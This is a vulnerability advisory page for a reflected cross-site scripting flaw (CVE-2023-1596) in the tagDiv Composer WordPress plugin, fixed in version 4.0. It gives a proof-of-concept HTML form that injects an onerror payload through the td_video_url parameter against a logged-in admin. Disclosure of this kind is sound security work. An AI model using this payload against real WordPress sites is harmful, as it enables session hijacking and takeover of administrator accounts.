tagDiv Composer < 4.0 – Reflected Cross-site Scripting | CVE 2023-1596 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="td_ajax_video_modal">
    <input type="text" name="td_video_url" value='" onerror=alert(`XSS`) mov'>
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

Fixed in 4.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Truoc Phan

Submitter

Truoc Phan

Submitter website

https://www.facebook.com/292706121240740

Submitter twitter

Verified

Yes

WPVDB ID

cada9be9-522a-4ce8-847d-c8fff2ddcc07

Timeline

Publicly Published

2023-04-24 (about 1 years ago)

Added

2023-04-24 (about 1 years ago)

Last Updated

2023-04-24 (about 1 years ago)

Other

Published

Title

Published

2022-04-04

Title

Menubar < 5.8 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

Folo - Cross Site Scripting

Published

2015-07-23

Title

WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2014-08-01

Title

Wise Search Widget 1.1 - s Parameter Reflected XSS

Published

2014-08-01

Title

JS MultiHotel 2.2.1 - includes/delete_img.php path Parameter Reflected XSS